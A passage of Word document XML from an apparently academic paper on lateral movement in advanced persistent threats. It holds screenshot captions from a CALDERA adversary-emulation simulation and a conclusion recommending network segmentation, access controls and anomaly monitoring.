      <w:r w:rsidR="00401235" w:rsidRPr="00E84236">
        <w:rPr>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> on CALDERA GUI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="611ADF95" w14:textId="77777777" w:rsidR="00401235" w:rsidRDefault="00A6296F" w:rsidP="00401235">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="07BF0A2A" wp14:editId="43719A55">
            <wp:extent cx="3089910" cy="677545"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="133279846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98469" name="Picture 9" descr="A screen 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9910" cy="677545"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F78CEB" w14:textId="15734DC2" w:rsidR="002C29E2" w:rsidRPr="00100559" w:rsidRDefault="00401235" w:rsidP="00100559">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E84236">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Fig</w:t>
      </w:r>
      <w:r w:rsidR="00E84236">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00E84236">
        <w:rPr>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008A4770">
        <w:rPr>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>13</w:t>
      </w:r>
      <w:r w:rsidRPr="00E84236">
        <w:rPr>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> Kali Linux POV </w:t>
      </w:r>
      <w:r w:rsidR="002C1E7D" w:rsidRPr="00E84236">
        <w:rPr>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>of CALDERA’s install path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E4F318" w14:textId="77777777" w:rsidR="002C1E7D" w:rsidRDefault="002C29E2" w:rsidP="002C1E7D">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="507391E7" wp14:editId="58922A35">
            <wp:extent cx="3537330" cy="1333949"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="30495422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54222" name="Picture 10"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46376" cy="1337360"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="312065EE" w14:textId="415CC4A7" w:rsidR="002C29E2" w:rsidRPr="00100559" w:rsidRDefault="002C1E7D" w:rsidP="00100559">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E84236">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Fig</w:t>
      </w:r>
      <w:r w:rsidR="00E84236">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00E84236">
        <w:rPr>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008A4770">
        <w:rPr>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>14</w:t>
      </w:r>
      <w:r w:rsidRPr="00E84236">
        <w:rPr>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A40E05" w:rsidRPr="00E84236">
        <w:rPr>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Adversaries Listing on CALDERA GUI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="141CD55A" w14:textId="77777777" w:rsidR="00A40E05" w:rsidRDefault="00E36EB3" w:rsidP="00A40E05">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="44644357" wp14:editId="1C676703">
            <wp:extent cx="3089910" cy="1040765"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="15217620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6204" name="Picture 11"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9910" cy="1040765"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2F71F7" w14:textId="2BB09EA9" w:rsidR="006C7716" w:rsidRPr="00E43300" w:rsidRDefault="00A40E05" w:rsidP="00F26CC8">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E43300">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Fig</w:t>
      </w:r>
      <w:r w:rsidR="00E43300" w:rsidRPr="00E43300">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00E43300">
        <w:rPr>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008A4770">
        <w:rPr>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>15</w:t>
      </w:r>
      <w:r w:rsidRPr="00E43300">
        <w:rPr>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E04178" w:rsidRPr="00E43300">
        <w:rPr>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>“Escalate and</w:t>
      </w:r>
      <w:r w:rsidR="00C42558" w:rsidRPr="00E43300">
        <w:rPr>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0006760F" w:rsidRPr="00E43300">
        <w:rPr>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Lateral Movement”</w:t>
      </w:r>
      <w:r w:rsidR="00F86EB0" w:rsidRPr="00E43300">
        <w:rPr>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> menu on CALDERA GUI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D73AD7" w14:textId="77777777" w:rsidR="00E36EB3" w:rsidRDefault="00E36EB3" w:rsidP="0070555C"/>
    <w:p w14:paraId="469E4C41" w14:textId="77777777" w:rsidR="00F86EB0" w:rsidRDefault="00861F77" w:rsidP="00F86EB0">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="79DA66DD" wp14:editId="3FE6DA49">
            <wp:extent cx="3089910" cy="1043305"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="92626831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68311" name="Picture 12"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9910" cy="1043305"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D3325E" w14:textId="6E700FEB" w:rsidR="00834922" w:rsidRDefault="00F86EB0" w:rsidP="00100559">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E84236">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Fig</w:t>
      </w:r>
      <w:r w:rsidR="00E84236">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00E84236">
        <w:rPr>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008A4770">
        <w:rPr>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>16</w:t>
      </w:r>
      <w:r w:rsidRPr="00E84236">
        <w:rPr>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00E84236">
        <w:rPr>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00E84236">
        <w:rPr>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00E84236">
        <w:rPr>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00E84236">
        <w:rPr>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> Adversarial traffic being logged on Kali Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D64762D" w14:textId="77777777" w:rsidR="00BF2185" w:rsidRPr="00BF2185" w:rsidRDefault="00BF2185" w:rsidP="00BF2185"/>
    <w:p w14:paraId="7CB309F3" w14:textId="513614F5" w:rsidR="00834922" w:rsidRPr="00FF6966" w:rsidRDefault="005D5BEC" w:rsidP="005D5BEC">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>CONCLUSION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE2DB9C" w14:textId="6AAF289A" w:rsidR="00834922" w:rsidRPr="00FF6966" w:rsidRDefault="0056308E" w:rsidP="00470082">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Advanced Persistent Threats (APTs) pose an increasingly formidable </w:t>
      </w:r>
      <w:r w:rsidR="00E857BB" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>challenge to organizations</w:t>
      </w:r>
      <w:r w:rsidR="00543EA3" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> and governments due to their sophisticated, stealthy, and multifaceted nature. This research, which focused specifically on mitigating lateral movement within the APT k</w:t>
      </w:r>
      <w:r w:rsidR="00547182" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ill chain, highlighted the critical </w:t>
      </w:r>
      <w:r w:rsidR="00DC5A0F" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>vulnerabilities</w:t>
      </w:r>
      <w:r w:rsidR="00B745D4" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> that exist in modern network architectures. As mentioned in the introduction, over 70% of modern network </w:t>
      </w:r>
      <w:r w:rsidR="008D337B" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>breaches occur from APTs utilizing lateral movement</w:t>
      </w:r>
      <w:r w:rsidR="004F0471" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="008D337B" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>based attacks, and only being discovered months later</w:t>
      </w:r>
      <w:r w:rsidR="005031C4" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t>[12]</w:t>
      </w:r>
      <w:r w:rsidR="005031C4" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00012532" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Through the lens of a simulated lateral movement attack using the CALDERA framework, it became evident that </w:t>
      </w:r>
      <w:r w:rsidR="00BB5938" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">networks with weak security controls, </w:t>
      </w:r>
      <w:r w:rsidR="007017FE" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidR="00A440F6" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> therefore</w:t>
      </w:r>
      <w:r w:rsidR="00CE10A3" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> a</w:t>
      </w:r>
      <w:r w:rsidR="007017FE" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> lack</w:t>
      </w:r>
      <w:r w:rsidR="00C876AB" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> of</w:t>
      </w:r>
      <w:r w:rsidR="00CE10A3" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> utilizing the</w:t>
      </w:r>
      <w:r w:rsidR="00C876AB" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Defense-in-</w:t>
      </w:r>
      <w:r w:rsidR="00CE10A3" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Depth doctrine</w:t>
      </w:r>
      <w:r w:rsidR="00A440F6" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00C94042" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> in addition to insufficient defensive controls, which include monitoring, remain prim</w:t>
      </w:r>
      <w:r w:rsidR="002E1E37" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ary enablers for APT actors</w:t>
      </w:r>
      <w:r w:rsidR="00CF313A" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> to infiltrate and expand their foothold. While the study was limited in scope due to time and resource constraints, the finders underscore the importance of proactive and layered defenses against such threats.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E9E8AB1" w14:textId="43054C75" w:rsidR="00CF313A" w:rsidRPr="00FF6966" w:rsidRDefault="00B77E69" w:rsidP="00470082">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>The simulation revealed that</w:t>
      </w:r>
      <w:r w:rsidR="00421D0A" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> lateral movement is not merely a secondary phase within an attack, but a pivotal stage where attackers consolidate their control, escalate privileges, and gain access to sensitive assets. The rese</w:t>
      </w:r>
      <w:r w:rsidR="00177688" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>arch affirmed that traditional security measures</w:t>
      </w:r>
      <w:r w:rsidR="00074D6C" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, such as perimeter defenses and reactive monitoring, are insufficient in detecting and mitigating </w:t>
      </w:r>
      <w:r w:rsidR="007F2AE8" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00074D6C" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ever-increasing </w:t>
      </w:r>
      <w:r w:rsidR="007F2AE8" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sophistication of lateral movement techniques</w:t>
      </w:r>
      <w:r w:rsidR="008E7895" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> effectively. Adversaries exploit weaknesses such as weak segmentation, overly permissive access controls, and legacy system vulnerabilities to navigate networks undetected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C3D5FE3" w14:textId="363EA9EE" w:rsidR="006421D6" w:rsidRPr="00FF6966" w:rsidRDefault="006421D6" w:rsidP="00470082">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>Implementing solutions to counter lateral movement requires a multi-faceted approach, such as network segmentation.</w:t>
      </w:r>
      <w:r w:rsidR="005F3B11" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> However, </w:t>
      </w:r>
      <w:r w:rsidR="00F121F7" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidR="005F3B11" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">etwork segmentation is only a </w:t>
      </w:r>
      <w:r w:rsidR="00A15167" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>foundational strategy</w:t>
      </w:r>
      <w:r w:rsidR="009461E9" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, supported by micro-segmentation and strict access control policies to limit the spread of an attack. </w:t>
      </w:r>
      <w:r w:rsidR="009461E9" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Additionally, deploying advanced detection systems capable of identifying anomalous behavior at granu</w:t>
      </w:r>
      <w:r w:rsidR="00D21D92" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">lar levels, such as unusual traffic patterns or privilege escalations, </w:t>
      </w:r>
      <w:r w:rsidR="00D34476" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>proved to be essential.</w:t>
      </w:r>
      <w:r w:rsidR="00F57E22" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EC14CF" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>While the research leveraged a CALDERA simulation</w:t>
      </w:r>
      <w:r w:rsidR="00D7203B" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> to illustrate vulnerabilities, it highlighted the potential</w:t>
      </w:r>
      <w:r w:rsidR="00724B3E" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> of tools like </w:t>
      </w:r>
      <w:r w:rsidR="00B5780C" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">CALDERA to provide </w:t>
      </w:r>
      <w:r w:rsidR="00E705E4" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>actionable</w:t>
      </w:r>
      <w:r w:rsidR="00854328" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> insights into attack paths and exploit methods. These findings validate the effectiveness of monitoring and analysis in enhancing an organization’s ability to preemptively respond to the </w:t>
      </w:r>
      <w:r w:rsidR="00E705E4" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>possibility</w:t>
      </w:r>
      <w:r w:rsidR="00854328" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> of an external threat employing lateral movement, once they have inevitably gained entry into the network(s).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B52B697" w14:textId="7F285549" w:rsidR="00854328" w:rsidRPr="00FF6966" w:rsidRDefault="00854328" w:rsidP="00470082">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00F428D3" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Overall,</w:t>
      </w:r>
      <w:r w:rsidR="00455A73" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> while APTs continue to evolve in sophistication, addressing </w:t>
      </w:r>
      <w:r w:rsidR="003E15C7" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">techniques to counter </w:t>
      </w:r>
      <w:r w:rsidR="00455A73" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">lateral movement </w:t>
      </w:r>
      <w:r w:rsidR="0097532B" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>will</w:t>
      </w:r>
      <w:r w:rsidR="006D5AB7" w:rsidRPr="00FF6966">
